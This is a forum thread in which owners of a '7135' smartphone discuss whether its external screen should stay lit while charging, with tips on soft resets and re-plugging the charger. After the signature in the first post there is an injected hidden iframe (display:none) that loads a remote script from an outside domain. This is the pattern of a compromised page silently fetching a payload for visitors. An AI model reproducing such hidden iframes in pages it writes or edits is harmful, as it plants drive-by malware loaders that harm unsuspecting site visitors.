+ Reply to Thread

question regarding 7135 charging

I was wondering if the screen on the top of the phone is supposed to stay lit while the device is charging, as mine does.

Marc<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: question regarding 7135 charging

Originally posted by 1stcare
    I was wondering if the screen on the top of the phone is supposed to stay lit while the device is charging, as mine does.

Marc
    Yep, and it makes for a nice little clock on my nightstand
    Please visit my picture site: Robert-O-Rama :)

Robert,

It seems that now the light does not stay on all the time, worried that somthing may be malfunctioning. based on your previous response.

Marc

Originally posted by 1stcare
    Robert,

It seems that now the light does not stay on all the time, worried that somthing may be malfunctioning. based on your previous response.

Marc
    There is another thread about this topic. Some people were saying that their light did not stay on when charging if the phone was off, but it did if the phone was on. The light on my 7135 stays on constantly when charging, no matter the state of the phone power.

the power on my phone is on.

I've also found that the light on my LCD sometimes goes out while the phone is charging. I have yet to figure out a pattern, but I suspect it is software related since it will go on and stay on if I do a soft reset and then plug in the charger. I chalk it up to just another wonderous mystery of the 7135.

Originally posted by Lnoble
    I've also found that the light on my LCD sometimes goes out while the phone is charging. I have yet to figure out a pattern, but I suspect it is software related since it will go on and stay on if I do a soft reset and then plug in the charger. I chalk it up to just another wonderous mystery of the 7135.
    I've had a few times where the light didn't stay on, but if I just unplug the charger from the 7135 and plug it right back in it stays on.
    Please visit my picture site: Robert-O-Rama :)

I'm a little concerned that the LCD backlight will fail in the future from being on for such long periods (when charging). Do you think 'burn out' is an issue?
    Marvin

Originally posted by marvho
    I'm a little concerned that the LCD backlight will fail in the future from being on for such long periods (when charging). Do you think 'burn out' is an issue?
    HoTSynC said back on 01-27-2003 that it should not be a problem...
    http://www.smartphonesource.com/vbul...&highlight=lcd
    ~'kito
    pdaPhoneHome Moderator

I find that the external light stays on when plugged in, unless I adjust the volume. That causes to shut off after a few seconds. To get it come back, open and close the flip.